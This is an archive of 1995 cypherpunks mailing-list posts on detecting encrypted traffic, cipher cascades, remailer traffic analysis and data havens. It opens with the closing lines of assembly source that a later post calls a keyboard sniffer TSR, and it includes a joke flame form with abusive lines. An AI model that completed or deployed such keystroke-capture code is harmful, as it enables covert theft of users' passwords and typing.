ASSUME  DS:CODE_SEG
        MOV     BX,CS
        MOV     DS,BX
        mov     lkb_tail,cx
 
 
        MOV     DX, offset kbia         ;ds:dx end of stay resident
        INT     27H                     ;allocate and stay resident
 
INSTALL_INTERRUPTS_MAIN       ENDP
 
 
CODE_SEG        ENDS
 
        END     FIRST
 
; P.S.  I haven't programmed in asm in a long time, no fair flaming
;me for poor programming style/ineffecient code.
; Use this code at your own rish.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 11 Jan 95 22:00:26 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <ab3a75370402100421a8@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 AM 01/12/95, Dale Harrison (AEGIS wrote:
>Won't work!  You can always embed an encrypted message in what 'looks'
>like plaintext.  A trivial example: Encrypt a message with a caesar
>cypher, then build a story where the first char of each word maps to
>each subsequent char from the encrypted text.  At the cost of expanding
>the size of the message by a factor of 5 to 10 you've hidden the
>encrypted message in what looks like a letter to your mother (or a news
>story in the NY Times, etc.)  This is old technique.

The context this was being discussed in, was trying to make _plaintext_
look like _ciphertext_. The operator of a data haven or remailer might
hypothetically want to ensure that all text he dealt with was encrypted.
So your method wouldn't do anything in that area.  Unless you can think of
a way to embed plaintext in ciphertext in such a  way that it looks like
ciphertext, and my guess is that any method that did that well would be
sufficiently obscure as to be analagous to encryption for our purposes.
Really bad encryption, with very little point, but still hidden text. Which
is the real point, the operator doesn't want to deal with any text  that
isn't "hidden" in some way.

Of course, we're not just dealing with text.  So the scheme has got to be
changed a bit so as to be able to detect unencrypted GIFs, and mu-law
files, and as yet to be determined unknown files.  I don't know enough
about what's being talked about to know if this entropy detecting stuff
will generalize to non text files. Cause we want to catch unencrypted GIFs
too.  [And doesn't compression alone do similar things to the entropy as
encryption does, anyhow? If someone compresses their file with a good
compression algorithm, as I understand it the non-randomness left will be
pretty low. But it won't meet the needs we're discussing, I don't think.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m00012@KANGA.STCLOUD.MSUS.EDU
Date: Wed, 11 Jan 95 23:05:03 PST
To: marko@millcomm.com
Subject: RE: How do I know if its encrypted?
Message-ID: <0098A541.0A71B0E0.1313@KANGA.STCLOUD.MSUS.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Check the entropy?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Wed, 11 Jan 95 22:02:54 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
Message-ID: <199501120607.BAA19021@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199501120502.VAA29808@largo.remailer.net>,
Eric Hughes <eric@remailer.net> wrote:
>   From: cactus@seabsd.hks.net (L. Todd Masco)
>
>   I'm wondering: would the strength be increased by using a randomly selected
>   symetric cypher? 
>
>Strength is not right aspect.  Global risk is reduced, simply because
>the aggregate cost of a breach is reduced.

Isn't it?  If an attacker does not know what cipher is used and breaking
each is computationally expensive (though not prohibitively so) doesn't
that add extra complexity?  IE, if cipher A, B, and C are attackable in
large but not prohibitive time, wouldn't an attacker have to spend more
cycles to break something that was randomly one of those?  I agree that
it's not a significantly large jump, but if an attacker has to go through
all the possibilities for A, B, before breaking something in C, it seems
that there's a small increase in strength (Not being argumentative,
really... I understand that this increase in strength isn't enough to
warrant any significant effort.  Just want to clarify the answer in
my mind).

>But selecting a single cipher is just as much a fixed policy as a
>randomly selected one is.  Far better to let the user pick a policy,
>both about sent and accepted ciphers.

Sure.  Ideally, a user could say "use A" or "use randomly A, C, or D" or
even "use A_x(C_x) or B_x(D_y)".   I'm not certain the "accept" is a great
idea, but what the hell... any theoretical general system should have
support for such a decision to be made, right?  As failure modes
multiply...

>   I guess this reduces to: do strong cyphers have "signatures" of some sort,
>   by which the type of encryption can be derived? 
>
>If they do, they're likely not _strong_ ciphers.

Great... that's the answer I was looking for, and what my gut feeling
was.  I'm trying to determine how much rope is too much for a first pass.

Related: is there, in general or in any known specific cases, any loss of
security in using sym. cipher A on ciphertext B (of another sym. cipher) with
the same key?  With different keys (I would think not, but I vaguely
remember mention of something here long ago)?
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxSMSBNhgovrPB7dAQECKQP/fqXwOcRmH6Z5dm8fsDnFzkCNyy5bc7Os
+/hWmyjlk6/qx2Ym0gvlIZaxMSVR68E1qQUaoiAaWY7SatskU8o6dZRI+SmON4NV
qSZnBh/+TnQwcTK0c0N+4m3Y8GhIk0ERX9modZfadv15Q07yfP7MXEj4yRQOse6e
WHmUg0WOhW4=
=GedZ
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxTHISoZzwIn1bdtAQEUbAGAuX+ALOTHZkUd8vqsWzVZWKSKwnJ+03yW
alp18VGBGaM4PLQWU0OAFmbBP8wUxBEz
=U5tO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Wed, 11 Jan 95 22:19:35 PST
To: cypherpunks@toad.com
Subject: Reefer madness
In-Reply-To: <199501112303.SAA14349@pipe1.pipeline.com>
Message-ID: <m0rSIt6-0002GZC@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


Seems to me I have seen something like this cybersmut hype
before... wasn't it called 'Reefer Madness'?

Craig



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Wed, 11 Jan 95 23:53:00 PST
To: tcmay@netcom.com
Subject: Re: How do I know if its encrypted? (fwd)
Message-ID: <Pine.3.89.9501120118.B3416-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



T.C. May, so eloquently  waxed:

The squeals of the net.cops were impressive to behold! Demands to
Netcom that I be expelled from the Net, that the "Child Welfare
Agents" would soon be breaking down my doors, etc. 

Nobody spotted the message. After several days, I "let the truth be
told," which of course enraged others. 

I thought this digression might be amusing to some.

--Tim May

Did they write the standard "ticket"?

form319.2(1/95)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 * * * * *  N O T I C E   O F   N E T I Q U E T T E   B R E A C H  * * * * *

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
NOTICE: IT HAS COME TO OUR ATTENTION THAT YOU HAVE POSTED 
          SOMETHING THAT HAS BEEN CONSIDERED WORSE THAN:

         ___ a Rush Limbaugh quote.
         ___ a Newt Gingrich joke.
         ___ a reference to Beavis & Butthead.
         _X_ lame ASCII graphic(s) (Choose all that apply):
             ___ USS Enterprise
             _X_ Australia
	     ___ The Amiga logo
             ___ Company logo
                 (Mark only if above also)
                 ___ and you stated that you don't speak for your employer.
             ___ Bicycle
	     ___ Bart Simpson

Furthermore:

_x_ You have greatly misunderstood the purpose of ___the.news.group___
						        (newsgroup)
_x_ You have greatly misunderstood the purpose of the net.
_x_ You are a loser.
___ You must have spent your entire life in a skinner box to be this
    clueless.
_x_ *plonk*
_x_ This has been pointed out to you before. (see prior form)
_x_ It is recommended that you:
    (Mark all that apply)
    _x_ stick to FidoNet and come back when you've grown up.
    _x_ find a volcano and throw yourself in.
    ___ get a gun and shoot yourself.
    _x_ stop reading Usenet news and get a life.
    ___ stop sending email and get a life.
    ___ consume excrement.
    ___ consume excrement and thus expire.

Additional comments:

My apologies to all responsible users who have had to view this horrible,
lousy, lame, excuse for writing.  I certainly hope this person gets their 
butt thrown in jail, but I'll settle for having their net access 
permanently revoked.

' . . . and thus ex

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO EVERY INTERNET NEWSGROUP NEAR YOU! . . . . . CENSORED.COM
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Thu, 12 Jan 95 00:32:22 PST
To: cypherpunks@toad.com
Subject: Data Havens..A consumer perspective
Message-ID: <Pine.3.89.9501120150.C3416-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



1. You have what I want or need.
2. In order for me to let you store it, I will give it to you
   anyway you wish to get it.
3. I will let you do anything to the data you wish, so long as I  
   get it back intact.
4. It is no concern (only idle curiosity maybe) where the data is parked.
5. I would expect to pay money for the safekeeping of my data.
6. I would expect the longer you hold the data, the more it will cost.
7. The only thing I am counting on is the data's timely retrieval.
8. Welcome to the world of data "coatchecking".

Why make it more complex than this?
From the moment the data leaves their hands, until I return it,
they have no right, nor I no obligation, to divulge anything about it.
For they already would know, it would take a few minutes to retrieve it.

For whether it's encrypted to the nth degree, or parked in a plain brown
wrapper in a massive unix box somewhere, as long as I the haven manager,
return the data in a safe, timely, uncorrupted manner, I've done my duty.

Love Always,

Carol Anne

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Thu, 12 Jan 95 01:23:31 PST
To: m00012@KANGA.STCLOUD.MSUS.EDU
Subject: Re: keyboard sniffer TSR source code...
In-Reply-To: <0098A540.BC444360.1303@KANGA.STCLOUD.MSUS.EDU>
Message-ID: <Pine.3.89.9501120308.G3416-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm sure that as many people are now silently testing it,
and that they are a bit busy at the moment,
I think they'd register their thanks if they could.

Love Always,

Carol Anne

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.stc.housing.washington.edu>
Date: Thu, 12 Jan 95 04:02:58 PST
To: cypherpunks@toad.com
Subject: mail killfiling
Message-ID: <199501121202.EAA03835@tower.stc.housing.washington.edu>
MIME-Version: 1.0
Content-Type: text



There was some talk on the list earlier about reading the list through
news so as to be able to use kill files.  Here is an alternate way for
folks that have 'deliver' installed on their system as the local mail
agent.  (do a "grep Mlocal /etc/sendmail.cf" to see...if you don't
see 'deliver' in there somewhere, you don't.  This is provided you are
using sendmail, of course.)

First, install the following as ".deliver" in your home dir:

--- cut here ---

#!/bin/sh
# delivers all mail except that from folks in $NOMAIL

NOMAIL=.nomail
FROM=`header -f From $HEADER`

if grep "$FROM" $NOMAIL >/dev/null 2>/dev/null

then        # we don't want any mail from this person!
      exit         
fi

echo "$1"  # otherwise, deliver as usual

--- cut here ---

Now, you also need this little script that I call "killem" installed
in your home dir.

--- cut here ---

#!/bin/sh
NOMAIL=.nomail
header -f From >> $NOMAIL

--- cut here ---

Now, let's say you are in your mailbox and you see such a horrible
piece of mail from someone that you never want to see any mail from
them again. ;)  Provided you are using 'elm', (probably is a mechanism for
this on other readers.)  just pipe the message through 'killem' with
a "|" from elm and answer "killem" when asked what you want to pipe
the message through.  The From: line will be stripped and stuck
in .nomail (or whatever you change it to) and you won't see any more
mail from this person.  Of course, this is not entirely true: mail
that does not get delivered will go to a file called Undel.mail in
your home dir, which you can keep, or have a cron job deal with, or
whatever you like.  Also, if they change their 'real name' on 
their system, you'll start to get mail from them again.  (i.e.
w/'chfn' or the like.)  

This is just a quick hack I whipped up a moment ago, and could of 
course be improved/changed.  'deliver' will also run perl scripts,
and it should be relatively easy to write something that way that
will handle wildcarding and field selection.  An automated mailing
to folks upon their 'termination' could be added for those that
want to rub it in, or an automated bounce that sends mail right
back with a note that their mail is not being received.

If you want to block mail based just upon the account name and not
have to worry about them changing their "real" name, you can just add
the account name to .nomail manually.  Judicious use of the unix 'cut'
command could have 'killem' just toss the account name into .nomail for
mail coming from unixy systems, but would fail for others, so I decided
to not assume anything about the From: line.  Ought to work fine
and transparently for most folks as-is.  Ingenious folks can build
on it.

I dunno how many systems use 'deliver', but it's sort of a Linux
(slackware) default, and those using it can avoid learning procmail
with this script.

Enjoy,
Craig.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Parsons <parsons@bga.com>
Date: Thu, 12 Jan 95 03:52:29 PST
To: cypherpunks@toad.com
Subject: Re: CBS/C.Chung Plan Hit Job on Internet? (fwd)
Message-ID: <Pine.3.89.9501120547.A11756-0100000@ivy.bga.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Wed, 11 Jan 1995 07:32:03 -0800 (PST)
From: Skip Leuschner <skipl@pacifier.com>
Subject: Re: CBS/C.Chung Plan Hit Job on Internet?

I see C.Chung's program as one of the first vollies in a new phase of a 
TV/print media project.

Internet and talk radio emerged as political forces in the '94 
election.  If political influence by the media is a zero-sum game, as I 
believe it is, then the TV and print media must look to their own 
survival by trying to discredit or regulate their talk radio/internet 
competition.

Regards, Skip.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 12 Jan 95 06:02:40 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: analysis of RemailerNet
Message-ID: <Pine.SUN.3.91.950112055457.3862B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've been reading through T.C. May's FAQ, and came upon this 
section about analyzing the RemailerNet.

>            + What's needed:
>              - aggreement on some terminology (this doesn't require
>                 consensus, just a clearly written paper to de facto
>                 establish the terminology)
>              - a formula relating degree of untraceability to the major
>                 factors that go into remailers: packet size and
>                 quantization, latency (# of messages), remailer policies,
>                 timing, etc.
>              - Also, analysis of how deliberate probes or attacks might
>                 be mounted to deduce remailer patterns (e.g., Fred always
>                 remails to Josh and Suzy and rarely to Zeke).
>            - I think this combinatorial analysis would be a nice little
>               monograph for someone to write.
>    8.10.2. A much-needed thing. Hal Finney has posted some calculations
>             (circa 1994-08-08), but more work is sorely needed.

I think one of the most difficult aspects of analyzing remailers is 
the large number of variables you have to deal with.  In 
contrast, when analyzing ciphers things are pretty much 
static.  The only thing variable you have to worry about is 
key length.  But think of the factors you have to include in 
a complete analysis of the RemailerNet:

1.  different methods of attack
        - passive traffic analysis (i.e., packet sniffing)
        - active attacks: including physical attacks, subverting 
          remailer security, flooding, denial-of-service,
          starting "trap" remailers, etc.

2.  differences at the user level
        - fixed vs random chains vs something in between
        - length of chains
        - numbers of real messages sent
        - numbers of fake (cover) messages sent
        - concerns about latency, bandwidth, and monetary costs
        - acceptibility of risk, and benifits of anonymity

3.  differences at the individual remailer level
        - the mixing mechanism: does batched mailing occur by time or by the
          number of messages in the queue, and is there a rollover pool?
        - security: including vulnerabilities to political, 
          physical, and electronic attacks
        - usage level
        - price

4.  differences at the RemailerNet level
        - total numbers of remailers
        - average security (or the number of compromised remailers)
        - total number of users

... and I'm sure there are more.  The number of variables and the 
complex way they're all interrelated make the analysis 
difficult.  Perhaps a good way to go about this is to construct 
simplified models which focus on different aspects.  For 
example, someone pointed out that if you didn't have to worry 
about active attacks, and the attacker can monitor all the 
remailers, then you can treat the entire RemailerNet as a 
single large remailer.  I'm not sure how well this approach 
would work, since I don't know how easy it would be to 
integrate the different simplified models into a realistic one.

Anyhow, this might at least give us some insights, so I'll 
make some attempts in this direction, and post my results.

Just to start things off though, let me try an *extremely*
simple model.

Assume there is just one remailer, it's perfectly secure, and it 
does 4 batches of remailing at equal intervals each day.  There are 
one million users, each of whom receives a mail from the remailer 
once per day.  Alice is sending anonymous mail to Bob through this 
system, also once per day.  But just to be extra careful, she 
also sends a cover mail to the remailer at some other time 
each day, which gets redirected to its /dev/null.

So the situation looks like this on day 1:

            Alice sends     Bob receives     some random user receives
Batch #1:       0                0                   0
Batch #2:       1                1                   0
Batch #3:       0                0                   1
Batch #4:       1                0                   0

Suppose Eve, the traffic analyst, is trying to figure out who 
Alice is sending mail to.  After the first day, she can 
eliminate about half of the remailer users from the list of possible 
targets, because they, like the the random user above,
received a mail even though Alice didn't send one out during the 
collection period of that batch.  Now, since Eve can eliminate 
on average half of the list every day, Bob will be the only person left on 
that list after about (log base 2 of one million) = 20 days.

Suppose Alice sent out some different numbers of cover e-mail:

        # of cover mail     # of days to discover Bob
               0               log base 4 of 1,000,000 = 10
               1               log base 2 of 1,000,000 = 20
               2               log base 4/3 of 1,000,000 = 48
               3               log base 1 of 1,000,000 = infinity!

Hopefully that makes sense...  Comments?

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxU0QTl0sXKgdnV5AQFkoAP/SSyqbbDw+zoh+q5aL0+xr5BcLzaEoS4h
NASocZvKHGLe8/sfefDj4J2zPINKhmQzbKdD4oHirPEVbnWZC+7Us3giCKl80t2V
bKx6QPB1hJWi6n3cFme6NCuTjmHCsgrQ/bI2j524O43FhW6BIQAAxQ6GGN10t1V8
3nv3SzUC6jE=
=Y2qv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 12 Jan 95 06:26:07 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: time stamping service (again)
Message-ID: <Pine.SUN.3.91.950112062429.3862C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My PGP based time stamping service is back online.  I took it 
down a while ago thinking the folks at notary.com (Digital 
Time-Stamp, Inc.) were going to release their commercial 
time stamping product soon (it uses a more elegant protocol that
doesn't require trust in the time stamper, but the algorithm
is patented).  But I haven't heard anything from them 
in a while.

Anyway, it is now running as the following procmail recipe:

:0 w
* ^Subject: Time Stamp This Mail
{
PGPPASS=whateveryourpassphraseis
:0 c w
| (lockfile timestamp.lock ; pgp -fast +batchmode +force +verbose=0 \
+clearsig=off) > timestamp.out
 
:0 a h
| (formail -r -i 'Subject: Time Stamp Output';cat timestamp.out) | \
($SENDMAIL -t ;rm -f timestamp.lock)
}

To use it, just send whatever you need time stamped to me with 
the subject "time stamp this mail".

BTW, can a procmail expert explain to me why the locallockfile 
mechanism doesn't work with this recipe?  If I use :0 w : as 
the first line, procmail will happily ignore the locallockfile 
flag and proceed to munge up timestamp.out, so I have to do 
the filelocking manually.

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxU7Zjl0sXKgdnV5AQE1agP/TFGtHEUj6GUwEF1ISGLcUZ/T64Vs7BUJ
PIcydYUDk/5AVPLS2F8r81oLLxDUzYFkVy/6uvhnj6Pvo17ZIx6ELhKNPLPVoLPL
iklR9E7rmY2cRMQfuCPRYi10x4mD9yJcw0GmlQmgOqZS/HfQ30njrsAeDXBUNvA5
SvFBaPKuOro=
=NNoJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Thu, 12 Jan 95 04:44:27 PST
To: carolb@barton.spring.com (Censored Girls Anonymous)
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <Pine.3.89.9501120150.C3416-0100000@barton.spring.com>
Message-ID: <199501121232.GAA01351@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 2. In order for me to let you store it, I will give it to you
>    anyway you wish to get it.a

I will let you store it but in order to access it I get access to your
stores of data.

> 3. I will let you do anything to the data you wish, so long as I  
>    get it back intact.

Actually for a real data haven to work it should not only keep the
original data but any inferences you make with the old data or any new
data you use in the analysis of the old data.

> 5. I would expect to pay money for the safekeeping of my data.

Or provide some service in kind.

> 6. I would expect the longer you hold the data, the more it will cost.

The longer you hold the data the less it is worth.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Thu, 12 Jan 95 05:57:08 PST
To: cypherpunks@toad.com
Subject: Re: Cybersmut
In-Reply-To: <199501112303.SAA14349@pipe1.pipeline.com>
Message-ID: <950112.065951.0M1.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, jya@pipeline.com writes:

[ two horsemen deletia ]

>    Brick said telltale signs of porn being downloaded include: 
>  
>    "If you have a 100-megabyte drive and it's always full and 
>    the kids are demanding more memory. Photos can take a lot 
>    of memory. " 

[ giggle, snort ]

A full 100 meg drive is a telltale sign of a typical Windoze
installation.

Sheesh!  These 'reporters' need a hobby...
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org
                   "I'm a family man, model citizen."
                                      -- Warren Zevon

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxUoORvikii9febJAQHQOQQAlG3rOFcDP54Wi6IAjBpfu+y3Bq7paB9V
gaTJ5wYG6EkvpkUIoHyimF2NXXpRVRcRJbtsE/bDNRfKV/csifTHlXILNl/IOE6r
RUPxTrHY7r0ubWouy4qdi5i4q4tQ88jOFYQUPu7jPJPfqzC7XX84l5vHMakytx0D
pI9CegILWtY=
=3NRh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Thu, 12 Jan 95 07:38:43 PST
To: cypherpunks@toad.com
Subject: Re: Cryptanalysis
Message-ID: <199501121537.HAA01536@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>If the encryption method is any good, the output will be pseudo-random
>with no digit being more frequent than any other. This certainly applies
>to IDEA and DES. With RSA, you usually have a random (IDEA) session key
>encrypted using the senders private key. This will also be an effectively
>'random' number.

Just a technical note, but a normal distribution of digits (i.e. 'no digit 
more frequent than any other') is no inidication of either randomness or 
'good' encryption.  A better test is to look for a normal distribution at 
all scale levels.  For example, the following text block: "UUU" (in ASCII) 
has a normal distribution at the bit level "0101 0101 0101 0101 0101 0101",
but not at the byte level.

Dale H.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:04:01 PST
To: cypherpunks@toad.com
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <Pine.3.89.9501120150.C3416-0100000@barton.spring.com>
Message-ID: <199501121602.IAA00806@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Censored Girls Anonymous <carolb@barton.spring.com>

   1. You have what I want or need.

You have a _service_ I want to use.

   8. Welcome to the world of data "coatchecking".

"Data coatchecking" certainly has different connotations than "data
haven".  I think for marketing purposes, the name "data haven" is
inaccurate.  A data haven, one might expect, has semantic structure to
it.  Offsite storage is much less than a data haven; it's much more
like a remote file system.

Using the word "haven" to refer to a remote storage facility removes
the connotation of ordinary usage, which, as we all know is a
perfectly upright, normal, and (for those in the USA) a downright
Capital-A _American_ thing to do.

   From the moment the data leaves their hands, until I return it,
   they have no right, nor I no obligation, to divulge anything about it.

You don't want the operator of a remote storage facility revealing
links about usage patterns of individuals, but as far as the data
itself goes, there's no reason it couldn't be made public (there's
also no good reason _to_ make it public, either).  Someone who sends
plaintext to a remote site is foolish.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:09:33 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <ab3a75370402100421a8@[132.162.201.201]>
Message-ID: <199501121608.IAA00812@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   Of course, we're not just dealing with text.  So the scheme has got to be
   changed a bit so as to be able to detect unencrypted GIFs, and mu-law
   files, and as yet to be determined unknown files.  

Each of these data formats has it's own regex recognizers available.
Just apply them.

The point, though, is to enforce the presumption that the remailer
operator does not, in fact, look at the traffic in order to understand
the content.  You don't need a completely airtight algorithm in order
to do this.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:14:14 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <199501120646.WAA28573@ix2.ix.netcom.com>
Message-ID: <199501121612.IAA00824@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: daleh@ix.netcom.com (Dale Harrison (AEGIS))

   It's an artificial example, but one that points out that merely doing a 
   frequency analysis on the datastream isn't enough to guantee the correct 
   answer.

You don't always need the correct answer.  You just need the correct
answer most of the time.  You're trying to create a presumption about
behavior.  Ensuring that you can't read almost all of the traffic is a
pretty good way to assure people that you don't try to make sense of
any of it.

The fundamental purpose here is social communication about intent.

   Reliable remailer software will have to worry about false postives 
   as well as false negatives; especially if it's a fee-for-service operation.

I just don't agree with this.  If you feel it needful to install an
entropy filter, expect that its failures will simply accrue to the
general unrealiability measurement for that remailer.

And there's no reason you couldn't publish the algorithm so that a
user couldn't check the entropy for themselves in advance.

   Of course the implicit assumption in that statement is that encrypted 
   traffic hasn't been outlawed or regulated, or that the sender doesn't want 
   to 'appear' to be sending encrypted traffic.

I don't design for the paranoid.

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:24:36 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
In-Reply-To: <199501120607.BAA19021@bb.hks.net>
Message-ID: <199501121623.IAA00846@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: cactus@seabsd.hks.net (L. Todd Masco)

   >Strength is not right aspect.  Global risk is reduced, simply because
   >the aggregate cost of a breach is reduced.

   Isn't it?  If an attacker does not know what cipher is used and breaking
   each is computationally expensive (though not prohibitively so) doesn't
   that add extra complexity?

Suppose that several symmetric ciphers are used and that one of them
is broken.  You then attempt to break all of the messages; the ones
that don't break are presumed to be one of the other ciphers.  So it
does nothing to improve strength.  Note, though, that the _rest_ of
the messages remain unbroken.

I am assuming that it's unlikely that all of the ciphers will be
broken simultaneously.

   Related: is there, in general or in any known specific cases, any
   loss of security in using sym. cipher A on ciphertext B (of another
   sym. cipher) with the same key?  With different keys (I would think
   not, but I vaguely remember mention of something here long ago)?

If you use the same key, the size of exhaustive search does not
increase.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:33:46 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
In-Reply-To: <199501121547.AA02187@poboy.b17c.ingr.com>
Message-ID: <199501121632.IAA00887@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: paul@poboy.b17c.ingr.com (Paul Robichaux)

   Must I
   require the user to tell that program what cypher was used to encrypt
   the file she wishes to decrypt?

Only if you don't want to store the type alongside.  See below.

   Is storing the cypher type as part of the encrypted file a weakness?

Well, it's no weaker than current systems.  PGP stores the cipher type
in the source code: it's always IDEA.  One should allow, however, the
cipher type to be empty alongside the data so that another tool can
store cipher information.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:38:56 PST
To: cypherpunks@toad.com
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <Pine.3.89.9501120925.C24527-0100000@nesta.pr.mcs.net>
Message-ID: <199501121637.IAA00893@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Nesta Stubbs <root@nesta.pr.mcs.net>

   > 3. I will let you do anything to the data you wish, so long as I  
   >    get it back intact.

   why would you give the haven owner free run?  I mean naturally he does 
   have free run with your data once he gets it, 

That's exactly the reason, namely, to make the agreement between
individuals match the underlying nature of information.  This is
different in the trust in silence about the user.  This is also not to
say that the operator can't undertake to make assurances about where
bits go and don't go.

   I am sure you 
   woudln't want your data stored ona  public access Unix system, or in 
   plaintext.

So don't store it in plaintext.  The operator of the data storage
facility has no responsibility for this.

   if the datahaven is turned into a data broker

I don't know about you, but I don't like paying money for random bits.

   well what would be thepurpose of this data haven you propose except as a 
